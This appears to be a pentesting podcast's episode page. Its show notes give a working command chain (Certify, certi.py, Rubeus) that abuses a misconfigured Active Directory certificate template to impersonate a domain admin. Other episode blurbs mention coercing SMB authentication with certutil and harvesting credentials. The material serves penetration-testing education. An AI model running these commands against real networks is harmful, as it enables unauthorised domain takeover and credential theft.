7MS #501: Tales of Pentest Pwnage - Part 31

7MS #501: Tales of Pentest Pwnage - Part 31

Today we're closing down 2021 with a tale of pentest pwnage - this time with a path to DA I had never had a chance to abuse before: Active Directory Certificate Services! For the full gory details on this attack path, see the Certified Pre-Owned paper from the SpecterOps crew. The TLDR/TLDL version of how I abused this path is as follows:

Run Certify.exe find /vulnerable, and if you get some findings, review the Certified Pre-Owned paper and the Certify readme file for guidance on how to exploit them. In my case, the results I got from Certify showed:

msPKI-Certificates-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT

Reading through the Certify readme, I learned "This allows anyone to enroll in this template and specify an arbitrary Subject Alternative Name (i.e. as a DA)." The Certify readme file walks you through how to attack this config specifically, but I had some trouble running all the tools from my non-domain-joined machine. So I used a combination of Certify and Certi to get the job done. First I started on Kali with the following commands:

sudo python3 /opt/impacket/examples/getTGT.py 'victimdomain.domain/MYUSER:MYPASS' export KRB5CCNAME=myuser.cache sudo python3 ./certi.py req 'victimdomain.domain/MYUSER@FQDN.TO.CERT.SERVER' THE-ENTERPRISE-CA-NAME -k -n --alt-name DOMAIN-ADMIN-I-WANT-TO-IMPERSONATE --template VULNERABLE-TEMPLATE NAME

From that you will get a .pfx file which you can bring over to your non-domain-joined machine and do:

rubeus.exe purge rubeus.exe asktgt /user:DOMAIN-ADMIN-I-WANT-TO-IMPERSONATE /certificate:DOMAIN-ADMIN-I-WANT-TO-IMPERSONATE@victim.domain.pfx /password:PASSWORD-TO-MY-PFX-FILE /domain:victimdomain.domain /dc:IP.OF.DOMAIN.CONTROLLER

And that's it! Do a dir \\FQDN.TO.DOMAIN.CONTROLLER\C$ and enjoy your new super powers!

Avsnitt(703)

7MS #639: Tales of Pentest Pwnage - Part 62

7MS #639: Tales of Pentest Pwnage - Part 62

Today's tale of pentest pwnage talks about the dark powers of the net.py script from impacket.

3 Sep 20247min

7MS #638: Tales of Pentest Pwnage – Part 61

7MS #638: Tales of Pentest Pwnage – Part 61

Today we're talking pentesting – specifically some mini gems that can help you escalate local/domain/SQL privileges: Check the C: drive! If you get local admin and the system itself looks boring, check root of C – might have some interesting scripts or folders with tools that have creds in them. Also look at Look at Get-ScheduledTasks Find ids and passwords easily in Snaffler output with this Snaffler cleaner script There's a ton of gold to (potentially) be found in SQL servers – check out my notes on using PowerUpSQL to find misconfigs and agent jobs you might able to abuse!

23 Aug 202432min

7MS #637: BPATTY[RELOADED] Release Party

7MS #637: BPATTY[RELOADED] Release Party

Hello friends, I'm excited to release BPATTY[RELOADED] into the world at https://bpatty.rocks! – which stands for Brian's Pentesting and Technical Tips for You! It's a knowledge base of IT and security bits that help me do a better job doing security stuff! Today I do an ACTUAL 7-minute episode (GASP…what a concept!) covering my favorite bits on the site so far. Enjoy!

17 Aug 20247min

7MS #636: A Prelude to BPATTY(RELOADED)

7MS #636: A Prelude to BPATTY(RELOADED)

Artificial hype alert! I'm working on a NEW version of BPATTY (Brian's Pentesting and Technical Tips for You), but it is delayed because of a weird domain name hostage negotiation situation. It's weird. But in the meantime I want to talk about the project (which is a pentest documentation library built on Docusaurus) and how I think it will be bigger/better/stronger/faster/cooler than BPATTY v1 (which is now in archive/read-only mode).

12 Aug 202411min

7MS #635: Eating the Security Dog Food - Part 7

7MS #635: Eating the Security Dog Food - Part 7

Today we're talking about eating the security dog food – specifically: Satisfying critical security control #1 Using the Atlassian family of tools to create a ticketing/change control system and wrap it into an asset inventory Leveraging Wazuh as a security monitoring system (with eventual plans to leverage its API to feed Atlassian inventory data)

3 Aug 202445min

7MS #634: Tales of Pentest Pwnage - Part 60

7MS #634: Tales of Pentest Pwnage - Part 60

Hi, today's tale of pentest pwnage covers a few wins and one loss: A cool opportunity to drop Farmer "crops" to a domain admin's desktop folder via PowerShell remote session Finding super sensitive data by dumpster-diving into a stale C:\Users\Domain-Admin profile Finding a vCenter database backup and being unable to pwn it using vcenter_saml_login

26 Juli 202432min

7MS #633: How to Create a Security Knowledgebase with Docusaurus

7MS #633: How to Create a Security Knowledgebase with Docusaurus

Hey friends, we're doing a little departure from our normal topics and focusing on how to create a security knowledgebase (is that one word or two?) using Docusaurus! It's cool, it's free, it's from Meta and you can get up and going in just a few commands – check out their getting started guide to get rockin' in about 5 minutes. Important files include: docusaurus.config.js – for setting the site title and key config settings sidebars.js – used to create/edit navigation bar menus /src/css/custom.css – to style the site

19 Juli 202414min

7MS #632: Tales of Pentest Pwnage – Part 59

7MS #632: Tales of Pentest Pwnage – Part 59

Today's tale of pentest pwnage includes some fun stuff, including: SharpGPOAbuse helps abuse vulnerable GPOs! Try submitting a harmless POC first via a scheduled task – like ping -n 1 your.kali.ip.address. When you're ready to fire off a task that coerces SMB auth, try certutil -syncwithWU \\your.kali.ip.address\arbitrary-folder. I'm not 100% sure on this, but I think scheduled tasks capture Kerberos tickets temporarily to workstation(s). If you're on a compromised machine, try Get-ScheduledTask -taskname "name" | select * to get information about what context the attack is running under. DonPAPI got an upgrade recently with a focus on evasion! When attacking vCenter (see our past YouTube stream for a walkthrough), make sure you've got the vmss2core utility, which I couldn't find anywhere except the Internet Archive. Then I really like to follow this article to pull passwords from VM memory dumps. Can't RDP into a victim system that you're PSRemote'd into? Maybe RDP is listening on an alternate port! Try Get-ItemProperty -path "HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp | select-object portnumber` And if you want to hang around until the very end, you can hear me brag about my oldest son who just became an EMT!

12 Juli 202448min

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